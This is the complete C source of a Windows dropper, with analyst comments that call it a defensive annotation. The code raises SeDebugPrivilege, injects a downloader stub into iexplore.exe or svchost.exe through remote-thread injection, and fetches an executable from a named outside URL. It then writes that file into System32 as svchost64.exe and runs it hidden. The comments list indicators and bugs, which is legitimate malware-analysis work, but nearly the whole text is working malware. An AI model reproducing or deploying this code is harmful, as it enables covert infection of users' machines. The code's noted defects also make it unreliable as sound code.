1. #include "stdafx.h" 2. #include "stdio.h" 3. #include "string.h" 4. #include <windows.h> 5. #include <wininet.h> 6. #include "tlhelp32.h" 7. #pragma comment(lib,"wininet.lib") |
/***********************************************/
/*
 * ANALYST NOTE (defensive annotation). This file is a dropper: it
 * injects a small downloader stub into another process, fetches an
 * executable over plain HTTP, writes it into the system directory under
 * a name that imitates svchost, and launches it. The comments below
 * describe what the code actually does so the sample can be triaged and
 * detected; the defects found in it are documented, not repaired.
 *
 * Every Win32 API the stub uses is reached through a function pointer
 * that is resolved at run time by name (see struct Inject), so the
 * copied code carries no imports and no string literals of its own.
 */
typedef HINSTANCE (__stdcall *fun_ShellExecute)(HWND hWnd, // ShellExecuteA prototype
    LPCTSTR lpOperation,
    LPCTSTR lpFile,
    LPCTSTR lpParameters,
    LPCTSTR lpDiretory,
    INT nShowCmd);

typedef int (__stdcall *fun_MessageBox)(HWND hWnd, LPCTSTR lpszText, // MessageBoxA prototype (resolved but never called)
    LPCTSTR lpszCaption, UINT nType);

// define functions in kernel32.dll
typedef HANDLE (__stdcall *fun_CreateFile)( LPCTSTR, DWORD, DWORD, // CreateFileA
    LPSECURITY_ATTRIBUTES,
    DWORD, DWORD, HANDLE );
typedef BOOL (__stdcall *fun_WriteFile)( HANDLE, LPCVOID, DWORD, // WriteFile
    LPDWORD, LPOVERLAPPED );
typedef BOOL (__stdcall *fun_CloseHandle)( HANDLE hObject ); // CloseHandle
typedef HMODULE (__stdcall *fun_GetModuleHandle)(LPCTSTR); // GetModuleHandleA
typedef FARPROC (__stdcall *fun_GetProcAddress)(HMODULE, LPCTSTR); // GetProcAddress
typedef HINSTANCE (__stdcall *fun_LoadLibrary)(LPCTSTR); // LoadLibraryA

// define functions in wininet.dll
typedef HINTERNET (__stdcall *fun_InternetOpen)(IN LPCTSTR lpszAgent, // InternetOpenA; lpszAgent becomes the HTTP User-Agent
    IN DWORD dwAccessType,
    IN LPCTSTR lpszProxyByName,
    IN LPCTSTR lpszProxyByPass,
    IN DWORD dwFlags);
typedef HINTERNET (__stdcall *fun_InternetOpenUrl)(IN HINTERNET hInternet,// InternetOpenUrlA
    IN LPCTSTR lpszUrl,
    IN LPCTSTR lpszHeaders OPTIONAL,
    IN DWORD dwHeadersLength,
    IN DWORD dwFlags,
    IN DWORD dwContext);
// NOTE(review): the real InternetReadFile and InternetCloseHandle return BOOL, not
// HINTERNET. The mismatch is harmless on 32-bit x86 (both come back in EAX) but is
// wrong as declared.
typedef HINTERNET (__stdcall *fun_InternetReadFile)(IN HINTERNET hFile, // InternetReadFile
    IN LPVOID lpBuffer,
    IN DWORD dwNumberOfBytesToRead,
    OUT LPDWORD lpdwNumberOfBytesRead);
typedef HINTERNET (__stdcall *fun_InternetCloseHandle)(IN HINTERNET hInternet); // InternetCloseHandle


/*
 * Parameter block copied into the target process right after the stub code.
 * The three function pointers are resolved by the dropper in its own process
 * (InsertThread) and reused unchanged in the target, which relies on
 * kernel32.dll being mapped at the same base in both processes (true in
 * practice on Windows within one boot session). All remaining fields are
 * plain char arrays so the stub needs no string constants of its own.
 */
typedef struct tag_Inject // define a structure to copy to distance process
{
    fun_GetModuleHandle GetModuleHandle;
    fun_GetProcAddress GetProcAddress;
    fun_LoadLibrary LoadLibrary;
    char szKernel[32];                 // "kernel32.dll"
    char szUser[32];                   // "user32.dll"
    char szNet[32];                    // "wininet.dll"
    char szShell[32];                  // "shell32.dll"
    char szMessageBox[32];             // export name; resolved by the stub but never used
    char szInternetOpen[32];
    char szInternetOpenUrl[MAX_PATH];
    char szInternetReadFile[128];
    char szInternetCloseHandle[32];
    char szCreateFile[32];
    char szWriteFile[32];
    char szCloseHandle[32];
    char szShellExecute[32];
    char szHeader[16];                 // extra HTTP request headers (exactly fits "Accept: */*\r\n\r\n" + NUL)
    char szInterFlag[32];              // User-Agent string — network IOC
    char szOpenFlag[10];               // populated ("wba") but never read by ThreadProc
    char szUrlAddr[MAX_PATH];          // download URL — network IOC
    char szUrlAddr1[MAX_PATH];         // populated ("") but never read by ThreadProc
    char szFilePath[MAX_PATH];         // where the payload is written and executed — host IOC
    char szFilePath1[MAX_PATH];        // never read by ThreadProc
}Inject;

/***************************************/

/************************************************/
/*
 * Downloader stub. Its bytes are copied verbatim into the target process by
 * InsertThread and started with CreateRemoteThread; Inject_info points at
 * the copy of struct Inject placed after the code.
 *
 * Because the code executes at a different address in a different process,
 * it must not touch anything from this image: every DLL and export name
 * comes from the struct and every call goes through a pointer obtained from
 * Inject_info->GetModuleHandle / LoadLibrary / GetProcAddress. Returns FALSE
 * on the failures it detects, TRUE once the payload has been launched.
 */
static BOOL ThreadProc(Inject* Inject_info)
{
    HMODULE hKernel32, hUser32, hWininet, hShell32; // module handles

    fun_InternetOpen j_InternetOpen; // function pointers resolved below
    fun_InternetOpenUrl j_InternetOpenUrl;
    fun_InternetReadFile j_InternetReadFile;
    fun_InternetCloseHandle j_InternetCloseHandle;
    fun_CreateFile j_CreateFile;
    fun_WriteFile j_WriteFile;
    fun_CloseHandle j_CloseHandle;
    fun_MessageBox j_MessageBox;
    fun_ShellExecute j_ShellExecute;

    // For each DLL: use the copy already mapped in the target, otherwise load it.
    hKernel32 = Inject_info->GetModuleHandle(Inject_info->szKernel); // already loaded?
    if (NULL == hKernel32) // not mapped
    {
        hKernel32 = Inject_info->LoadLibrary(Inject_info->szKernel); // load explicitly
        if (NULL == hKernel32) // load failed
        {
            return FALSE;
        }
    }

    hUser32 = Inject_info->GetModuleHandle(Inject_info->szUser);
    if (NULL == hUser32)
    {
        hUser32 = Inject_info->LoadLibrary(Inject_info->szUser);
        if (NULL == hUser32)
        {
            return FALSE;
        }
    }

    hWininet = Inject_info->GetModuleHandle(Inject_info->szNet);
    if (NULL == hWininet)
    {
        hWininet = Inject_info->LoadLibrary(Inject_info->szNet);
        if (NULL == hWininet)
        {
            return FALSE;
        }
    }

    hShell32 = Inject_info->GetModuleHandle(Inject_info->szShell);
    if (NULL == hShell32)
    {
        hShell32 = Inject_info->LoadLibrary(Inject_info->szShell);
        if (NULL == hShell32)
        {
            return FALSE;
        }
    }

    // Resolve exports by name. None of the results is NULL-checked, so a missing
    // export would be called through a null pointer.
    j_InternetOpen = (fun_InternetOpen)Inject_info->GetProcAddress(hWininet, // InternetOpenA
        Inject_info->szInternetOpen);
    j_InternetOpenUrl = (fun_InternetOpenUrl)Inject_info->GetProcAddress(hWininet, // InternetOpenUrlA
        Inject_info->szInternetOpenUrl);
    j_InternetReadFile = (fun_InternetReadFile)Inject_info->GetProcAddress(hWininet, // InternetReadFile
        Inject_info->szInternetReadFile);
    j_InternetCloseHandle = (fun_InternetCloseHandle)Inject_info->GetProcAddress(hWininet, // InternetCloseHandle
        Inject_info->szInternetCloseHandle);

    j_CreateFile = (fun_CreateFile)Inject_info->GetProcAddress(hKernel32, // CreateFileA
        Inject_info->szCreateFile);
    j_WriteFile = (fun_WriteFile)Inject_info->GetProcAddress(hKernel32, // WriteFile
        Inject_info->szWriteFile);
    j_CloseHandle = (fun_CloseHandle)Inject_info->GetProcAddress(hKernel32, // CloseHandle
        Inject_info->szCloseHandle);
    j_MessageBox = (fun_MessageBox)Inject_info->GetProcAddress(hUser32, // MessageBoxA (never called)
        Inject_info->szMessageBox);
    j_ShellExecute = (fun_ShellExecute)Inject_info->GetProcAddress(hShell32, // ShellExecuteA
        Inject_info->szShellExecute);
    HINTERNET hNet, hFile; // WinINet session handle and request handle

    // szInterFlag ("RookIE/1.0" as initialised by InsertThread) is the lpszAgent
    // argument, i.e. it is sent as the HTTP User-Agent. Proxy settings are taken
    // from the target process's preconfigured (IE) settings.
    hNet = j_InternetOpen(Inject_info->szInterFlag, INTERNET_OPEN_TYPE_PRECONFIG,
        NULL, NULL, 0); // open a WinINet session
    if (NULL == hNet) // session could not be opened
    {
        return FALSE;
    }

    // NOTE(review): strlen() here is a CRT call emitted inside the relocated
    // stub. It only works if the compiler inlines it as an intrinsic; otherwise
    // the copied code calls into an address that means nothing in the target
    // process — confirm in the disassembly. The flags force a fresh fetch and
    // bypass the WinINet cache.
    hFile = j_InternetOpenUrl(hNet, Inject_info->szUrlAddr, Inject_info->szHeader,
        strlen(Inject_info->szHeader),
        INTERNET_FLAG_DONT_CACHE|INTERNET_FLAG_RELOAD, 0); // request the URL; returns a handle to the resource
    if (NULL == hFile) // request failed (hNet is leaked)
    {
        return FALSE;
    }

    char buff[1024]; // transfer buffer
    DWORD dwRead, // bytes read per call
        dwWritten = NULL; // bytes actually written


    // NOTE(review): CreateFileA signals failure with INVALID_HANDLE_VALUE, not
    // NULL, so this check never fires. If the file cannot be created (e.g. no
    // write access to the system directory) the loop below writes to an
    // invalid handle and ShellExecuteA is later asked to run a file that does
    // not exist. CREATE_ALWAYS overwrites any existing file of that name.
    HANDLE hCreateFile = j_CreateFile(Inject_info->szFilePath, GENERIC_READ|GENERIC_WRITE, // always create the file
        0, NULL, CREATE_ALWAYS, 0 ,NULL);
    if (NULL == hCreateFile) // intended failure check (see note above)
    {
        return FALSE;
    }
    // Stream the response body to disk in 1023-byte chunks. dwRead == 0 marks
    // end of data; WriteFile's return value is ignored, so a short or failed
    // write goes unnoticed.
    while(j_InternetReadFile(hFile, buff, 1023, &dwRead))
    {
        if (0 == dwRead) // no more data (or an error the loop cannot tell apart)
            break;
        j_WriteFile(hCreateFile, buff, dwRead, &dwWritten, NULL); // append chunk to the local file

    }
    // The session handle is closed before the request handle derived from it;
    // WinINet closes derived handles with their parent, so the second call
    // presumably fails harmlessly.
    j_InternetCloseHandle(hNet); // close the session handle
    j_InternetCloseHandle(hFile); // close the request handle
    j_CloseHandle(hCreateFile); // close the local file

    // Execute the downloaded file with the default verb and a hidden window.
    // Nothing about the downloaded content is verified before it is run.
    j_ShellExecute(NULL, NULL, Inject_info->szFilePath, NULL, NULL, SW_HIDE); // run the dropped payload


    return TRUE;
}

/*
 * Empty marker function. InsertThread uses (AddressFlag - ThreadProc) as the
 * byte length of the stub, which assumes the compiler/linker places
 * AddressFlag immediately after ThreadProc and emits ThreadProc as a single
 * contiguous, self-contained body — TODO confirm for the build in question;
 * optimising or function-level-linking builds may break this assumption.
 */
static void AddressFlag(void)
{
}
/****************************************************************************************************************/


/***************************************************************************************/
/* Enable SeDebugPrivilege for the current process                                     */
/***************************************************************************************/

/****************************************************************************************************************/
/*
 * Enables SE_DEBUG_NAME in the caller's own token so that OpenProcess can
 * later succeed against processes owned by other accounts (svchost.exe).
 * Returns TRUE only if GetLastError() is ERROR_SUCCESS after
 * AdjustTokenPrivileges; for a non-administrative caller that call reports
 * ERROR_NOT_ALL_ASSIGNED, so this returns FALSE there. The return values of
 * LookupPrivilegeValue and OpenProcessToken are not checked, and hToken is
 * never closed.
 */
BOOL ImprovePrivilege() // raise the process's privileges
{
    HANDLE hToken = NULL ; // token handle
    BOOL bRet = FALSE; // result
    TOKEN_PRIVILEGES tp = {1, {0, 0, SE_PRIVILEGE_ENABLED}}; // one privilege entry, LUID filled in below, attribute = enabled

    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); // look up the LUID for SeDebugPrivilege
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken); // open our own token for adjustment
    AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof tp, 0, 0); // request SeDebugPrivilege
    bRet = (GetLastError() == ERROR_SUCCESS); // succeeded only if every privilege was assigned
    return bRet;
}
/****************************************************************************************************************/

/***************************************************************************************/
/* Get the process ID of IExplore.exe                                                  */
/***************************************************************************************/

/****************************************************************************************************************/
/*
 * Returns the PID of the first process whose image name, lower-cased, is
 * "iexplore.exe" or "svchost.exe"; returns 0 if neither is found. These are
 * the injection targets (browser for network access that looks legitimate,
 * svchost.exe as a ubiquitous SYSTEM/service host).
 *
 * Observed defects: the 256-byte buffer from new[] is never deleted; the
 * snapshot handle is not closed when a match is returned; Process32First's
 * result is not checked; and when ImprovePrivilege fails the function returns
 * FALSE (0), which the caller then passes to OpenProcess as a PID.
 */
DWORD Get_ProcID()
{
    char* strProc = new char[256]; // scratch copy of the image name (never freed)
    HANDLE hSnap; // snapshot handle
    PROCESSENTRY32 ppe; // process entry

    hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); // snapshot of all processes

    if (!ImprovePrivilege()) // enable SeDebugPrivilege first
    {
        return FALSE;
    }
    ppe.dwSize = sizeof( PROCESSENTRY32 ); // required before the first call
    Process32First( hSnap, &ppe ); // first process (result unchecked)
    while ( 1 ) // walk the process list looking for a target
    {
        strcpy(strProc, ppe.szExeFile); // copy the image name (szExeFile is MAX_PATH, buffer is 256)
        strProc = strlwr(strProc); // case-insensitive compare via lower-casing
        if (0 == strcmp(strProc, "iexplore.exe"))// Internet Explorer
        {
            return ppe.th32ProcessID;
        }
        else if (0 == strcmp(strProc, "svchost.exe"))// a service host
        {
            return ppe.th32ProcessID;
        }
        if ( !Process32Next( hSnap, &ppe ))
        {
            break;
        }
    }
    CloseHandle( hSnap );
    return 0;
}
/*************************************/

/*************************************************************************************/
/* Run ThreadProc as a thread injected into the browser/svchost process              */
/*************************************/

/*************************************/
/*
 * Classic remote-thread injection: VirtualAllocEx(PAGE_EXECUTE_READWRITE) in
 * the target, WriteProcessMemory of the stub bytes followed by the Inject
 * parameter block, then CreateRemoteThread pointing at the copied code. An
 * RWX allocation in a foreign process followed by CreateRemoteThread is a
 * strong detection signal for this technique.
 *
 * Indicators carried by this function (as initialised below):
 *   - download URL  : http://www.hf-hx.com/music/x.exe (plain HTTP)
 *   - dropped file  : <GetSystemDirectory()>\svchost64.exe (masquerades as svchost)
 *   - User-Agent    : "RookIE/1.0"
 *   - request header: "Accept: */*\r\n\r\n"
 *   - targets       : iexplore.exe or svchost.exe (see Get_ProcID)
 *
 * Returns FALSE on any failed Win32 call, TRUE once the remote thread has
 * been created. hProc is never closed.
 */
BOOL InsertThread()
{
    char szSystemRoot[MAX_PATH];
    PDWORD pdwRemote = NULL; // base of the allocation in the target
    const int iCodeSize = ((LPBYTE)AddressFlag - (LPBYTE)ThreadProc);// stub length, assuming AddressFlag directly follows ThreadProc

    Inject *InjectRemote = NULL; // where the Inject copy lands in the target
    DWORD dwThread = NULL,
        dwOut = NULL,
        dwProc = Get_ProcID(); // 0 if no target process was found
    HANDLE hProc = NULL;
    // Code + parameter block + up to 3 bytes of alignment slack. Note the struct
    // offset below rounds up with "+4", so when iCodeSize is already a multiple
    // of 4 the struct ends one byte past cbMemSize; VirtualAllocEx's page
    // granularity presumably hides this.
    const DWORD cbMemSize = iCodeSize + sizeof(Inject) + 3; // bytes to allocate remotely


    Inject Inject_stru = {NULL, NULL, NULL,
        "kernel32.dll",
        "user32.dll",
        "wininet.dll",
        "shell32.dll",
        "MessageBoxA",
        "InternetOpenA",
        "InternetOpenUrlA",
        "InternetReadFile",
        "InternetCloseHandle",
        "CreateFileA",
        "WriteFile",
        "CloseHandle",
        "ShellExecuteA",
        "Accept: */*\r\n\r\n",      // szHeader
        "RookIE/1.0",               // szInterFlag -> HTTP User-Agent (IOC)
        "wba",                      // szOpenFlag (unused by the stub)
        "http://www.hf-hx.com/music/x.exe", // szUrlAddr -> payload URL (IOC)
        ""}; // szUrlAddr1; szFilePath/szFilePath1 start zeroed

    // Build the drop path: system directory + "\svchost64.exe" (IOC).
    GetSystemDirectory(szSystemRoot, sizeof(szSystemRoot)); // typically C:\Windows\System32
    strcat(szSystemRoot, "\\svchost64.exe"); // file name chosen to blend in with svchost.exe
    strcpy(Inject_stru.szFilePath, szSystemRoot); // hand the path to the stub via the struct

    // Resolve the three bootstrap APIs in our own process. The addresses are
    // reused unchanged in the target, which works because kernel32.dll is
    // mapped at the same base in every process of a boot session.
    HMODULE hKernel32 = GetModuleHandle("kernel32.dll");
    Inject_stru.GetModuleHandle = (fun_GetModuleHandle)GetProcAddress(hKernel32, "GetModuleHandleA");// bind GetModuleHandleA
    Inject_stru.GetProcAddress = (fun_GetProcAddress)GetProcAddress(hKernel32, "GetProcAddress"); // bind GetProcAddress
    Inject_stru.LoadLibrary = (fun_LoadLibrary)GetProcAddress(hKernel32, "LoadLibraryA");// bind LoadLibraryA

    // Full access to the target; for svchost.exe this needs SeDebugPrivilege
    // (ImprovePrivilege). Fails when dwProc is 0.
    hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProc); // open the target process with full access
    if (NULL == hProc)
    {
        return FALSE;
    }

    // RWX memory in the target for code + parameters.
    pdwRemote = (PDWORD)VirtualAllocEx(hProc, NULL, cbMemSize, MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); // allocate in the remote process
    if (NULL == pdwRemote)
    {
        return FALSE;
    }

    // Copies cbMemSize bytes starting at ThreadProc, i.e. more than the stub
    // itself (it reads past AddressFlag into whatever follows in this image);
    // the excess is overwritten by the struct copy below.
    if (!WriteProcessMemory(hProc, pdwRemote, (LPVOID)ThreadProc, cbMemSize, &dwOut)) // copy the stub code
    {
        return FALSE;
    }

    // Place the parameter block on the next 4-byte boundary after the code.
    InjectRemote = (Inject*)(((LPBYTE)pdwRemote) + ((iCodeSize + 4) & ~3));
    if (!WriteProcessMemory(hProc, InjectRemote, &Inject_stru, sizeof(Inject_stru), &dwOut)) // copy the parameter block
    {
        return FALSE;
    }

    // Start the copied stub with the remote struct as its single argument.
    // ThreadProc is declared without __stdcall, so the cast to
    // LPTHREAD_START_ROUTINE hides a calling-convention mismatch; it appears
    // to be tolerated on x86 because the thread exits after returning.
    if (NULL == CreateRemoteThread(hProc, NULL, 65535, (LPTHREAD_START_ROUTINE)pdwRemote, InjectRemote, 0, NULL)) // create the remote thread
    {
        return FALSE;
    }

    return TRUE;
}
/******************************************/

/*
 * Entry point: performs the injection and exits immediately, ignoring the
 * result. The dropper process is gone by the time the remote thread in the
 * target downloads and launches the payload.
 */
int APIENTRY WinMain(HINSTANCE hInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpCmdLine,
    int nCmdShow)
{
    InsertThread();
    return 0;
}